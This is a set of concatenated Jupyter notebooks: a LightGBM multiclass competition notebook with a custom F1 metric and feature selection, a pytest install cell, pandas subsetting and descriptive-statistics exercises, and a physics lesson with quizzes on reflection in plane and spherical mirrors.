cols_ordered_after_ordinal_encoding = categorical_columns.append(not_categorical_columns)
cols_ordered_after_ordinal_encoding
geo_cols = pd.Index(['geo_level_1_id', 'geo_level_2_id', 'geo_level_3_id'])
cat_cols_plus_geo = categorical_columns.append(geo_cols)
list(cat_cols_plus_geo)
train_data = lgb.Dataset(X_all_ints, label=y, feature_name=list(cols_ordered_after_ordinal_encoding),
categorical_feature=list(cat_cols_plus_geo))
# train_data = lgb.Dataset(X_all_ints, label=y)
validation_data = lgb.Dataset('validation.svm', reference=train_data)
###Output
_____no_output_____
###Markdown
After reading through the docs for [lgb.train](https://lightgbm.readthedocs.io/en/latest/pythonapi/lightgbm.train.html) and [lgb.cv](https://lightgbm.readthedocs.io/en/latest/pythonapi/lightgbm.cv.html), I had to make a separate function `get_ith_pred` and then call that repeatedly within `lgb_f1_score`. The function's docstring explains how it works. I have used the same argument names as in the LightGBM docs. This can work for any number of classes but does not work for binary classification. In the binary case, `preds` is a 1D array containing the probability of the positive class (it does not contain groups).
###Code
# Taken from the docs for lgb.train and lgb.cv
# Helpful Stackoverflow answer:
# https://stackoverflow.com/questions/50931168/f1-score-metric-in-lightgbm
from sklearn.metrics import f1_score
def get_ith_pred(preds, i, num_data, num_class):
"""
preds: 1D NumPY array
A 1D numpy array containing predicted probabilities. Has shape
(num_data * num_class,). So, For binary classification with
100 rows of data in your training set, preds is shape (200,),
i.e. (100 * 2,).
i: int
The row/sample in your training data you wish to calculate
the prediction for.
num_data: int
The number of rows/samples in your training data
num_class: int
The number of classes in your classification task.
Must be greater than 2.
LightGBM docs tell us that to get the probability of class 0 for
the 5th row of the dataset we do preds[0 * num_data + 5].
For class 1 prediction of 7th row, do preds[1 * num_data + 7].
sklearn's f1_score(y_true, y_pred) expects y_pred to be of the form
[0, 1, 1, 1, 1, 0...] and not probabilities.
This function translates preds into the form sklearn's f1_score
understands.
"""
# Does not work for binary classification, preds has a different form
# in that case
assert num_classs > 2
preds_for_ith_row = [preds[class_label * num_data + i]
for class_label in range(num_class)]
# The element with the highest probability is predicted
return np.argmax(preds_for_ith_row)
def lgb_f1_micro(preds, train_data):
y_true = train_data.get_label()
num_data = len(y_true)
num_class = 3
y_pred = []
for i in range(num_data):
ith_pred = get_ith_pred(preds, i, num_data, num_class)
y_pred.append(ith_pred)
return 'f1', f1_score(y_true, y_pred, average='micro'), True
probs = [[.12, 0.18, 0.7],
[0.2, 0.5, 0.3]]
[np.argmax(p) for p in probs]
param = {'num_leaves': 120,
# 'num_iterations': 240,
'min_child_samples': 40,
'learning_rate': 0.2,
'boosting_type': 'goss',
'objective': 'multiclass',
'num_class': 3}
# LGBM seem to hate using plurals. Why???
num_round = 10
evals_result = {}
booster = lgb.train(param, train_data, num_round,
categorical_feature=list(cat_cols_plus_geo),
feval=lgb_f1_micro, evals_result=evals_result)
evals_result
lgb.plot_metric(evals_result)
booster.feature_importance()
# LGBM seem to hate using plurals. Why???
num_boost_round = 100
cv_results = lgb.cv(param, train_data, num_boost_round, nfold=5,
categorical_feature=list(cat_cols_plus_geo),
feval=lgb_f1_micro)
cv_results.keys()
plt.plot(cv_results['f1-mean'])
f1_mean = cv_results['f1-mean']
max(f1_mean)
np.argmax(f1_mean)
len(f1_mean[20:35])
plt.plot(range(20, 35), f1_mean[20:35])
plt.xticks()
plt.show()
eval_results = {}
booster = lgb.train(param,
train_data,
28,
# valid_sets=[validation_data],
categorical_feature=list(cat_cols_plus_geo),
feval=lgb_f1_micro,
evals_result=evals_result)
# early_stopping_rounds=5)
booster.feature_importance()
data = {'name': booster.feature_name(),
'importance': booster.feature_importance()}
df_booster = pd.DataFrame(data)
df_booster
###Output
_____no_output_____
###Markdown
Submit this new modelThis model with the native LightGBM API looks like an improvement over the sklearn implementation. Let's give it a whirl!
###Code
def make_submission_lgbm_api(booster, ct, title):
"""
ct: ColumnTransformer
The ColumnTransformer class already fit to X_train to label encode
the features
label_enc: LabelEncoder
The LabelEncoder used to transform y to [0, 1, 2]
"""
X_test = pd.read_csv(DOWNLOAD_DIR / 'test_values.csv',
index_col='building_id')
X_test_ints = ct.transform(X_test)
prediction_probabilities = booster.predict(X_test_ints)
# Shift by 1 as submission is in format [1, 2, 3]
predictions = [np.argmax(p) + 1 for p in prediction_probabilities]
sub_format = pd.read_csv(DOWNLOAD_DIR / 'submission_format.csv',
index_col='building_id')
my_sub = pd.DataFrame(data=predictions,
columns=sub_format.columns,
index=sub_format.index)
my_sub.to_csv(SUBMISSIONS_DIR / f'{title}.csv')
title = '02-26 LightGBM API - All features - 28 rounds - cat+geo are cat features'
make_submission_lgbm_api(booster, ct, title)
###Output
_____no_output_____
###Markdown
Woop That Scored 0.7446 (with cv score of 0.7446) and pushed me up 100 places to 227Let's remove some unimportant features
###Code
df_booster
with open(DATA_DIR / 'df_feature_importance_lgbm_api.pkl', 'wb') as f:
pickle.dump(df_booster, f)
with open(DATA_DIR / 'df_feature_importance_lgbm_api.pkl', 'rb') as f:
a = pickle.load(f)
with open(DATA_DIR / 'cat_cols_plus_geo.pkl', 'wb') as f:
pickle.dump(cat_cols_plus_geo, f)
###Output
_____no_output_____
###Markdown
Want to test now which features give the best performance and then submit the best one(s)1. fi > 02. fi > 103. fi > 204. fi > 505. fi > 706. fi > 1007. fi > 2008. fi > 5009. fi > 80010. fi > 1000
###Code
# These are the features we want to include
keep = df_booster[df_booster.importance > 500].name.values
keep
test = list(cols_ordered_after_ordinal_encoding)
test
def cv_with_fi_range(keep_features=-1, num_boost_round=50):
"""
Perform cv with native LightGBM API
keep_feautures: int
Keep features with feature importance greater than this value.
Default: -1 to keep all features
"""
X_train = pd.read_csv(DOWNLOAD_DIR / 'train_values.csv',
index_col='building_id')
y_train = pd.read_csv(DOWNLOAD_DIR / 'train_labels.csv',
index_col='building_id')
# Must ordinal encode the categorical columns for LGBM to work
categorical_columns = X.select_dtypes(include='object').columns
t = [('ord_encoder', OrdinalEncoder(dtype=int), categorical_columns)]
ct = ColumnTransformer(transformers=t, remainder='passthrough')
X_train_ints = ct.fit_transform(X_train)
# Must label encode y (LGBM expects [0, 1, 2] as classes)
label_enc = LabelEncoder()
y_train = label_enc.fit_transform(np.ravel(y))
non_cat_cols = X.select_dtypes(exclude='object').columns
cols_after_ord_encoding = categorical_columns.append(non_cat_cols)
# Turn into DF
df_ints = pd.DataFrame(data=X_train_ints,
columns=cols_after_ord_encoding)
with open(DATA_DIR / 'df_feature_importance_lgbm_api.pkl', 'rb') as f:
df_feature_importance = pickle.load(f)
# Only keep features with FI > keep_features
mask = df_feature_importance.importance > keep_features
features_to_use = df_feature_importance[mask].name.values
X_train_kept_features = df_ints[features_to_use]
feature_names = list(df_ints[features_to_use].columns)
# Need this to check which columns remain are categorical
with open(DATA_DIR / 'cat_cols_plus_geo.pkl', 'rb') as f:
cat_cols_plus_geo = pickle.load(f)
# Create list of categorical features
categorical_features = []
for feature in feature_names:
if feature in cat_cols_plus_geo:
categorical_features.append(feature)
train_dataset = lgb.Dataset(X_train_kept_features,
label=y_train,
feature_name=feature_names,
categorical_feature=categorical_features)
param = {'num_leaves': 120,
# 'num_iterations': 240,
'min_child_samples': 40,
'learning_rate': 0.2,
'boosting_type': 'goss',
'objective': 'multiclass',
'num_class': 3}
cv_results = lgb.cv(param,
train_dataset,
num_boost_round,
nfold=5,
categorical_feature=categorical_features,
feval=lgb_f1_micro)
f1_mean = cv_results['f1-mean']
fig, ax = plt.subplots()
ax.plot(f1_mean)
title = f'F1-score kept features above {keep_features} feature importance'
ax.set(title=title,
xlabel='Boosting round',
ylabel='f1-score (micro)')
plt.show()
print(f'RESULTS KEEPING FEATURES > {keep_features} FEATURE IMPORTANCE')
print('Best f1 score: ', max(f1_mean))
print('Best f1 score iteration:', np.argmax(f1_mean))
###Output
_____no_output_____
###Markdown
TL;DRKeeping features above feature importance 20 gives the best results: 0.7448 (in comparison to 0.7446 with all features). Do 26 iterations.
###Code
cv_with_fi_range(-1)
cv_with_fi_range(0)
cv_with_fi_range(10)
cv_with_fi_range(20)
cv_with_fi_range(50)
cv_with_fi_range(70)
cv_with_fi_range(100)
cv_with_fi_range(200)
cv_with_fi_range(500)
cv_with_fi_range(800)
cv_with_fi_range(1000)
###Output
[LightGBM] [Warning] Auto-choosing col-wise multi-threading, the overhead of testing was 0.001996 seconds.
You can set `force_col_wise=true` to remove the overhead.
[LightGBM] [Info] Total Bins 10528
[LightGBM] [Info] Number of data points in the train set: 208480, number of used features: 2
[LightGBM] [Info] Using GOSS
[LightGBM] [Warning] Auto-choosing col-wise multi-threading, the overhead of testing was 0.002865 seconds.
You can set `force_col_wise=true` to remove the overhead.
[LightGBM] [Info] Total Bins 10528
[LightGBM] [Info] Number of data points in the train set: 208481, number of used features: 2
[LightGBM] [Info] Using GOSS
[LightGBM] [Warning] Auto-choosing col-wise multi-threading, the overhead of testing was 0.002405 seconds.
You can set `force_col_wise=true` to remove the overhead.
[LightGBM] [Info] Total Bins 10528
[LightGBM] [Info] Number of data points in the train set: 208481, number of used features: 2
[LightGBM] [Info] Using GOSS
[LightGBM] [Warning] Auto-choosing row-wise multi-threading, the overhead of testing was 0.000522 seconds.
You can set `force_row_wise=true` to remove the overhead.
And if memory is not enough, you can set `force_col_wise=true`.
[LightGBM] [Info] Total Bins 10528
[LightGBM] [Info] Number of data points in the train set: 208481, number of used features: 2
[LightGBM] [Info] Using GOSS
[LightGBM] [Warning] Auto-choosing row-wise multi-threading, the overhead of testing was 0.000539 seconds.
You can set `force_row_wise=true` to remove the overhead.
And if memory is not enough, you can set `force_col_wise=true`.
[LightGBM] [Info] Total Bins 10528
[LightGBM] [Info] Number of data points in the train set: 208481, number of used features: 2
[LightGBM] [Info] Using GOSS
[LightGBM] [Info] Start training from score -2.339173
[LightGBM] [Info] Start training from score -0.564028
[LightGBM] [Info] Start training from score -1.094582
[LightGBM] [Warning] No further splits with positive gain, best gain: -inf
[LightGBM] [Info] Start training from score -2.339128
[LightGBM] [Info] Start training from score -0.564032
[LightGBM] [Info] Start training from score -1.094586
[LightGBM] [Warning] No further splits with positive gain, best gain: -inf
[LightGBM] [Info] Start training from score -2.339178
[LightGBM] [Info] Start training from score -0.564024
[LightGBM] [Info] Start training from score -1.094586
[LightGBM] [Warning] No further splits with positive gain, best gain: -inf
[LightGBM] [Info] Start training from score -2.339178
[LightGBM] [Info] Start training from score -0.564032
[LightGBM] [Info] Start training from score -1.094572
[LightGBM] [Warning] No further splits with positive gain, best gain: -inf
[LightGBM] [Info] Start training from score -2.339178
[LightGBM] [Info] Start training from score -0.564032
[LightGBM] [Info] Start training from score -1.094572
[LightGBM] [Warning] No further splits with positive gain, best gain: -inf
[LightGBM] [Warning] No further splits with positive gain, best gain: -inf
[LightGBM] [Warning] No further splits with positive gain, best gain: -inf
[LightGBM] [Warning] No further splits with positive gain, best gain: -inf
[LightGBM] [Warning] No further splits with positive gain, best gain: -inf
[LightGBM] [Warning] No further splits with positive gain, best gain: -inf
[LightGBM] [Warning] No further splits with positive gain, best gain: -inf
[LightGBM] [Warning] No further splits with positive gain, best gain: -inf
[LightGBM] [Warning] No further splits with positive gain, best gain: -inf
[LightGBM] [Warning] No further splits with positive gain, best gain: -inf
[LightGBM] [Warning] No further splits with positive gain, best gain: -inf
[LightGBM] [Warning] No further splits with positive gain, best gain: -inf
[LightGBM] [Warning] No further splits with positive gain, best gain: -inf
[LightGBM] [Warning] No further splits with positive gain, best gain: -inf
[LightGBM] [Warning] No further splits with positive gain, best gain: -inf
[LightGBM] [Warning] No further splits with positive gain, best gain: -inf
[LightGBM] [Warning] No further splits with positive gain, best gain: -inf
[LightGBM] [Warning] No further splits with positive gain, best gain: -inf
[LightGBM] [Warning] No further splits with positive gain, best gain: -inf
[LightGBM] [Warning] No further splits with positive gain, best gain: -inf
[LightGBM] [Warning] No further splits with positive gain, best gain: -inf
[LightGBM] [Warning] No further splits with positive gain, best gain: -inf
[LightGBM] [Warning] No further splits with positive gain, best gain: -inf
[LightGBM] [Warning] No further splits with positive gain, best gain: -inf
[LightGBM] [Warning] No further splits with positive gain, best gain: -inf
[LightGBM] [Warning] No further splits with positive gain, best gain: -inf
[LightGBM] [Warning] No further splits with positive gain, best gain: -inf
[LightGBM] [Warning] No further splits with positive gain, best gain: -inf
[LightGBM] [Warning] No further splits with positive gain, best gain: -inf
[LightGBM] [Warning] No further splits with positive gain, best gain: -inf
[LightGBM] [Warning] No further splits with positive gain, best gain: -inf
[LightGBM] [Warning] No further splits with positive gain, best gain: -inf
[LightGBM] [Warning] No further splits with positive gain, best gain: -inf
[LightGBM] [Warning] No further splits with positive gain, best gain: -inf
[LightGBM] [Warning] No further splits with positive gain, best gain: -inf
[LightGBM] [Warning] No further splits with positive gain, best gain: -inf
[LightGBM] [Warning] No further splits with positive gain, best gain: -inf
[LightGBM] [Warning] No further splits with positive gain, best gain: -inf
[LightGBM] [Warning] No further splits with positive gain, best gain: -inf
[LightGBM] [Warning] No further splits with positive gain, best gain: -inf
|
novice/02-02/Latihan 02-02.ipynb | ###Markdown
PyTest Sumber bacaan instalasi: https://docs.pytest.org/en/6.2.x/getting-started.html Bacaan lengkap tentang pytest: https://docs.pytest.org/en/6.2.x/
###Code
pip install -U pytest
###Output
Requirement already satisfied: pytest in c:\users\evangs mailoa\appdata\local\programs\python\python39\lib\site-packages (6.2.5)
Requirement already satisfied: atomicwrites>=1.0 in c:\users\evangs mailoa\appdata\local\programs\python\python39\lib\site-packages (from pytest) (1.4.0)Note: you may need to restart the kernel to use updated packages.
Requirement already satisfied: py>=1.8.2 in c:\users\evangs mailoa\appdata\local\programs\python\python39\lib\site-packages (from pytest) (1.11.0)
Requirement already satisfied: iniconfig in c:\users\evangs mailoa\appdata\local\programs\python\python39\lib\site-packages (from pytest) (1.1.1)
Requirement already satisfied: packaging in c:\users\evangs mailoa\appdata\local\programs\python\python39\lib\site-packages (from pytest) (21.3)
Requirement already satisfied: attrs>=19.2.0 in c:\users\evangs mailoa\appdata\local\programs\python\python39\lib\site-packages (from pytest) (21.4.0)
Requirement already satisfied: pluggy<2.0,>=0.12 in c:\users\evangs mailoa\appdata\local\programs\python\python39\lib\site-packages (from pytest) (1.0.0)
Requirement already satisfied: toml in c:\users\evangs mailoa\appdata\local\programs\python\python39\lib\site-packages (from pytest) (0.10.2)
Requirement already satisfied: colorama in c:\users\evangs mailoa\appdata\local\programs\python\python39\lib\site-packages (from pytest) (0.4.4)
Requirement already satisfied: pyparsing!=3.0.5,>=2.0.2 in c:\users\evangs mailoa\appdata\local\programs\python\python39\lib\site-packages (from packaging->pytest) (3.0.6)
|
module-2/lab-subsetting-and-descriptive-stats/your-code/W4-Subsetting and Descriptive Stats_solution.ipynb | ###Markdown
Import all the libraries that are necessary
###Code
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
%matplotlib inline
###Output
_____no_output_____
###Markdown
Challenge 1 In this problem we will use the Temp_States.csv file In this challenge we will use the `Temp_States.csv` file. First import it into a data frame called `temp`.
###Code
Temp = pd.read_csv('Temp_States.csv')
Temp
###Output
_____no_output_____
###Markdown
Explore the data types of the Temp dataframe. What type of data do we have? Comment your result.
###Code
Temp.dtypes
###Output
_____no_output_____
###Markdown
Select the rows where state is New York
###Code
Temp.loc[Temp.State=='New York']
###Output
_____no_output_____
###Markdown
What is the average of the temperature of cities in New York?
###Code
Temp.loc[Temp.State=='New York'].mean()
###Output
_____no_output_____
###Markdown
We want to know cities and states with Temperature above 15 degress Celcius
###Code
Temp.loc[Temp['Temperature']>15]
###Output
_____no_output_____
###Markdown
Now, return only the cities that have a temperature above 15 degress Celcius
###Code
Temp['City'].loc[Temp['Temperature']>15]
###Output
_____no_output_____
###Markdown
We want to know which cities have a temperature above 15 degrees Celcius and below 20 degrees Celcius*Hint: First write the condition then select the rows.*
###Code
Temp[(Temp['Temperature'] >= 15) & (Temp['Temperature'] <25)]
###Output
_____no_output_____
###Markdown
Find the mean and the standard deviation of the temperature of each state.*Hint: Use functions from Data Manipulation lesson*
###Code
Temp.groupby('State').agg(['mean', 'std'])
###Output
_____no_output_____
###Markdown
Challenge 2 Load the `employee.csv` file into a DataFrame. Call the dataframe `employee`
###Code
employee= pd.read_csv('Employee.csv')
###Output
_____no_output_____
###Markdown
Explore the data types of the Temp dataframe. Comment your results
###Code
employee.dtypes
###Output
_____no_output_____
###Markdown
Show visually the frequency distribution (histogram) of the employee dataset. In few words describe these histograms?
###Code
employee.hist(bins=20)
###Output
_____no_output_____
###Markdown
What's the average salary in this company?
###Code
employee.Salary.mean()
###Output
_____no_output_____
###Markdown
What's the highest salary?
###Code
employee.Salary.max()
###Output
_____no_output_____
###Markdown
What's the lowest salary?
###Code
employee.Salary.min()
###Output
_____no_output_____
###Markdown
Who are the employees with the lowest salary?
###Code
employee.loc[employee['Salary']==employee.Salary.min()]
###Output
_____no_output_____
###Markdown
Could you give all the information about an employee called David?
###Code
employee.loc[employee['Name']=='David']
###Output
_____no_output_____
###Markdown
Could you give only David's salary?
###Code
employee.loc[employee['Name']=='David']['Salary']
###Output
_____no_output_____
###Markdown
Print all the rows where job title is associate
###Code
employee.loc[employee['Title']=='associate']
###Output
_____no_output_____
###Markdown
Print the first 3 rows of your dataframe Tip : There are 2 ways to do it. Do it both ways
###Code
employee.iloc[:3]
employee[:3]
###Output
_____no_output_____
###Markdown
Find the employees who's title is associate and the salary above 55?
###Code
employee.loc[(employee.Salary>55) & (employee.Title=='associate')]
###Output
_____no_output_____
###Markdown
Group the employees based on their number of years of employment. What are the average salaries in each group?
###Code
employee.groupby('Years').mean()['Salary']
###Output
_____no_output_____
###Markdown
What is the average Salary per title?
###Code
employee.groupby('Title').mean()
###Output
_____no_output_____
###Markdown
Show a visual summary of the data using boxplot. What Are the First and Third Quartiles? Comment your results. * Hint : Quantiles vs Quartiles* - `In Probability and Statistics, quantiles are cut points dividing the range of a probability distribution into continuous intervals with equal probabilities. When division is into four parts the values of the variate corresponding to 25%, 50% and 75% of the total distribution are called quartiles.`
###Code
employee.boxplot()
employee.quantile(0.25)
employee.quantile(0.75)
###Output
_____no_output_____
###Markdown
Is the mean salary per gender different?
###Code
employee.groupby(['Gender']).mean()
###Output
_____no_output_____
###Markdown
Find the minimum, mean and the maximum of all numeric columns for each Department. Hint: Use functions from Data Manipulation lesson
###Code
employee.groupby('Department').agg(['min','max','mean'])
###Output
_____no_output_____
###Markdown
Bonus Question For each department, compute the difference between the maximal salary and the minimal salary. * Hint: try using `agg` or `apply` and `lambda`*
###Code
employee.groupby('Department')[['Salary']].agg(lambda x: x.max()- x.min())
###Output
_____no_output_____
###Markdown
Challenge 3 Open the Orders.csv dataset. Name your dataset orders
###Code
orders= pd.read_csv('Orders.csv')
###Output
_____no_output_____
###Markdown
Explore your dataset by looking at the data types and the summary statistics. Comment your results
###Code
orders.dtypes
orders.describe()
###Output
_____no_output_____
###Markdown
What is the average Purchase Price?
###Code
orders['amount_spent'].mean()
###Output
_____no_output_____
###Markdown
What were the highest and lowest purchase prices?
###Code
orders['amount_spent'].min()
orders['amount_spent'].max()
###Output
_____no_output_____
###Markdown
Select all the customers we have in Spain
###Code
orders.loc[orders.Country=='Spain']
###Output
_____no_output_____
###Markdown
How many customers do we have in Spain? Hint : Use value_counts()
###Code
orders.loc[orders.Country=='Spain']['Country'].value_counts()
###Output
_____no_output_____
###Markdown
Select all the customers who have bought more than 50 items ?
###Code
orders.loc[orders.Quantity>50]
###Output
_____no_output_____
###Markdown
Select orders from Spain that are above 50 items
###Code
orders.loc[(orders.Quantity>50) & (orders.Country=='Spain')]
###Output
_____no_output_____
###Markdown
Select all free orders
###Code
orders.loc[orders.amount_spent==0]
###Output
_____no_output_____
###Markdown
Select all orders that are 'lunch bag' Hint: Use string functions
###Code
orders.loc[orders.Description.str.startswith('lunch bag')]
###Output
_____no_output_____
###Markdown
Select all orders that are made in 2011 and are 'lunch bag'
###Code
orders.loc[(orders.Description.str.startswith('lunch bag')) & (orders.year==2011)]
###Output
_____no_output_____
###Markdown
Show the frequency distribution of the amount spent in Spain.
###Code
orders.loc[orders.Country=='Spain']['amount_spent'].hist(bins=50)
###Output
_____no_output_____
###Markdown
Select all orders made in the month of August
###Code
orders.loc[orders.month==8]
###Output
_____no_output_____
###Markdown
Select how many orders are made by countries in the month of August Hint: Use value_counts()
###Code
orders.loc[orders.month==8]['Country'].value_counts()
###Output
_____no_output_____
###Markdown
What's the average amount of money spent by country
###Code
orders.groupby('Country').mean()['amount_spent']
###Output
_____no_output_____
###Markdown
What's the most expensive item?
###Code
orders.loc[orders.amount_spent==orders.amount_spent.max()]
###Output
_____no_output_____
###Markdown
What was the average amount spent per year ?
###Code
orders.groupby('year').mean()
###Output
_____no_output_____ |
_build/html/_sources/curriculum-notebooks/Science/ReflectionsOfLightByPlaneAndSphericalMirrors/reflections-of-light-by-plane-and-spherical-mirrors.ipynb | ###Markdown

###Code
from IPython.display import display, Math, Latex, HTML
HTML('''<script>
function code_toggle() {
if (code_shown){
$('div.input').hide('500');
$('#toggleButton').val('Show Code')
} else {
$('div.input').show('500');
$('#toggleButton').val('Hide Code')
}
code_shown = !code_shown
}
$( document ).ready(function(){
code_shown=false;
$('div.input').hide()
});
</script>
<form action="javascript:code_toggle()"><input type="submit" id="toggleButton" value="Show Code"></form>''')
from helper import *
%matplotlib inline
###Output
_____no_output_____
###Markdown
Reflection of Light by Plane and Spherical Mirrors IntroductionWhen light shines onto the surface of an object, some of the light is reflected, while the rest is either absorbed or transmitted. We can imagine the light consisting of many narrow beams that travel in straight-line paths called **rays**. The light rays that strike the surface are called the **incident rays**. The light rays that reflect off the surface are called the **reflected rays**. This model of light is called the **ray model**, and it can be used to describe many aspects of light, including the reflection and formation of images by plane and spherical mirrors. Law of ReflectionTo measure the angles of the incident and reflected rays, we first draw the **normal**, which is the line perpendicular to the surface. The **angle of incidence, $\theta_{i}$,** is the angle between the incident ray and the normal. Likewise, the **angle of reflection, $\theta_{r}$,** is the angle between the reflected ray and the normal. The incident ray, the reflected ray, and the normal to the reflecting surface all lie within the same plane. This is shown in the figure above. Notice that the angle of reflection is equal to the angle of incidence. This is known as the **law of reflection**, and it can be expressed by the following equation:$$\theta_{r} = \theta_{i}$$ Use the slider below to change the angle of incidence. This changes the angle between the incident ray and the normal. Notice how the angle of reflection also changes when the slider is moved.
###Code
interactive_plot = widgets.interactive(f, Angle=widgets.IntSlider(value=45,min=0,max=90,step=15,continuous_update=False))
output = interactive_plot.children[-1]
output.layout.height = '280px'
interactive_plot
###Output
_____no_output_____
###Markdown
**Question:** *When the angle of incidence increases, what happens to the angle of reflection?*
###Code
#Assign each multiple choice to these four variables
#Option_1 contains the answer
option_1 = "The angle of reflection increases."
option_2 = "The angle of reflection decreases."
option_3 = "The angle of reflection remains constant."
option_4 = "The angle of reflection equals zero."
multiple_choice(option_1, option_2, option_3, option_4)
###Output
[1m(A) [0;0mThe angle of reflection decreases.
[1m(B) [0;0mThe angle of reflection remains constant.
[1m(C) [0;0mThe angle of reflection equals zero.
[1m(D) [0;0mThe angle of reflection increases.
###Markdown
Specular and Diffuse Reflections For a very smooth surface, such as a mirror, almost all of the light is reflected to produce a **specular reflection**. In a specular reflection, the reflected light rays are parallel to one another and point in the same direction. This allows specular reflections to form images. If the surface is not very smooth, then the light may bounce off of the surface in various directions. This produces a **diffuse reflection**. Diffuse reflections cannot form images. **Note:** The law of reflection still applies to diffuse reflections, even though the reflected rays are pointing in various directions. We can imagine that each small section of the rough surface is like a flat plane orientated differently than the sections around it. Since each of these sections is orientated differently, the angle of incidence is different at each section. This causes the reflected rays to scatter. **Question:** *Which of the following is an example of a specular reflection?*
###Code
#Assign each multiple choice to these four variables
#Option_1 contains the answer
option_1 = "The reflection off a clean window."
option_2 = "The reflection off a wooden deck."
option_3 = "The reflection off a carpet floor."
option_4 = "The reflection off a table cloth."
multiple_choice(option_1, option_2, option_3, option_4)
###Output
[1m(A) [0;0mThe reflection off a wooden deck.
[1m(B) [0;0mThe reflection off a clean window.
[1m(C) [0;0mThe reflection off a carpet floor.
[1m(D) [0;0mThe reflection off a table cloth.
###Markdown
**Question:** *Which of the following is an example of a diffuse reflection?*
###Code
#Assign each multiple choice to these four variables
#Option_1 contains the answer
option_1 = "The reflection off a concrete sidewalk."
option_2 = "The reflection off a mirror."
option_3 = "The reflection off the surface of a still lake."
option_4 = "The reflection off a polished sheet of metal."
multiple_choice(option_1, option_2, option_3, option_4)
###Output
[1m(A) [0;0mThe reflection off the surface of a still lake.
[1m(B) [0;0mThe reflection off a polished sheet of metal.
[1m(C) [0;0mThe reflection off a concrete sidewalk.
[1m(D) [0;0mThe reflection off a mirror.
###Markdown
Image Formation by Plane MirrorsA **plane mirror** is simply a mirror made from a flat (or planar) surface. These types of mirrors are commonly found in bedroom or bathroom fixtures. When an object is reflected in a plane mirror, the image of the object appears to be located behind the mirror. This is because our brains interpret the reflected light rays entering our eyes as having travelled in straight-line paths. The light rays entering our eyes simply do not contain enough information for our brains to differentiate between a straight-line path and a path that changed direction due to a reflection. Notice in the figure above that the light rays do not actually converge at the location where the image appears to be formed (behind the mirror). Since the light rays do not actually go behind the mirror, they are represented as projections using dashed lines. If a film were placed at the image location behind the mirror, it would not be able to capture the image. As a result, this type of image is called a **virtual image**. For objects reflected in a plane mirror, the distance of the image from the mirror, $d_{i}$, is always equal to the distance of the object from the mirror, $d_{o}$. If the object is moved toward the mirror, the image of the object will also move toward the mirror such that the object and the image are always equidistant from the surface of the mirror. Use the slider below to change the object distance. Notice how the image distance also changes when the slider is moved.
###Code
interactive_plot = widgets.interactive(f,Distance=widgets.IntSlider(value=30,min=10,max=50,step=10,continuous_update=False))
output = interactive_plot.children[-1]
output.layout.height = '280px'
interactive_plot
#Print question
distance = round(random.uniform(5,10),1)
print("If you stand " + str(distance) + " m in front of a plane mirror, how many metres behind the mirror is your virtual image?")
#Answer calculation
answer = distance
#Assign each multiple choice to these four variables
#Option_1 contains the answer
option_1 = str(round((answer),1)) + " m"
option_2 = str(round((answer * 2),1)) + " m"
option_3 = str(round((answer / 2),1)) + " m"
option_4 = str(round((answer / 4),1)) + " m"
multiple_choice(option_1, option_2, option_3, option_4)
#Print question
distance = round(random.uniform(5,10),1)
print("If you stand " + str(distance) + " m in front of a plane mirror, how many metres will separate you from your virtual image?")
#Answer calculation
answer = (distance * 2)
#Assign each multiple choice to these four variables
#Option_1 contains the answer
option_1 = str(round((answer),1)) + " m"
option_2 = str(round((answer * 2),1)) + " m"
option_3 = str(round((answer / 2),1)) + " m"
option_4 = str(round((answer / 4),1)) + " m"
multiple_choice(option_1, option_2, option_3, option_4)
###Output
If you stand 6.8 m in front of a plane mirror, how many metres will separate you from your virtual image?
[1m(A) [0;0m13.6 m
[1m(B) [0;0m6.8 m
[1m(C) [0;0m27.2 m
[1m(D) [0;0m3.4 m
###Markdown
Spherical MirrorsTwo common types of curved mirror are formed from a section of a sphere. If the reflection takes place on the inside of the spherical section, then the mirror is called a **concave mirror**. The reflecting surface of a concave mirror curves inward and away from the viewer. If the reflection takes place on the outside of the spherical section, then the mirror is called a **convex mirror**. The reflecting surface of a convex mirror curves outward and toward the viewer. The **centre of curvature, $C$,** is the point located at the centre of the sphere used to create the mirror. The **vertex, $V$,** is the point located at the geometric centre of the mirror itself. The **focus, $F$,** is the point located midway between the centre of curvature and the vertex. The line passing through the centre of curvature and the vertex is called the **principal axis**. Notice that the focus also lies on the principal axis. When an incident ray parallel to the principle axis strikes the mirror, the reflected ray always passes through the focus. When an incident ray passes through the focus and strikes the mirror, the reflected ray is always parallel to the principle axis. (In the above diagrams, reverse the arrow directions to see this case). These properties make the focus particularly useful when examining spherical mirrors. **Note:** The distance from the centre of curvature to the vertex is equal to the **radius, $R$,** of the sphere used to create the mirror. Any straight line drawn from the centre to any point on the surface of a spherical mirror will have a length equal to the radius. The distance from the vertex to the focus is called the **focal length, $f$**. This distance is equal to half the distance of the radius.$$f = \frac{R}{2}$$
###Code
#Print question
radius = round(random.uniform(10,30),1)
print("If the radius of a curved mirror is " + str(radius) + " cm, how many centimetres is the focal length?")
#Answer calculation
answer = radius/2
#Assign each multiple choice to these four variables
#Option_1 contains the answer
option_1 = str(round((answer),1)) + " cm"
option_2 = str(round((answer * 2),1)) + " cm"
option_3 = str(round((answer / 2),1)) + " cm"
option_4 = str(round((answer * 4),1)) + " cm"
multiple_choice(option_1, option_2, option_3, option_4)
#Print question
focal_length = round(random.uniform(5,15),1)
print("If the focal length of a curved mirror is " + str(focal_length) + " cm, how many centimetres is the radius of curvature?")
#Answer calculation
answer = focal_length*2
#Assign each multiple choice to these four variables
#Option_1 contains the answer
option_1 = str(round((answer),1)) + " cm"
option_2 = str(round((answer * 2),1)) + " cm"
option_3 = str(round((answer / 2),1)) + " cm"
option_4 = str(round((answer / 4),1)) + " cm"
multiple_choice(option_1, option_2, option_3, option_4)
###Output
If the focal length of a curved mirror is 6.1 cm, how many centimetres is the radius of curvature?
[1m(A) [0;0m3.0 cm
[1m(B) [0;0m24.4 cm
[1m(C) [0;0m6.1 cm
[1m(D) [0;0m12.2 cm
###Markdown
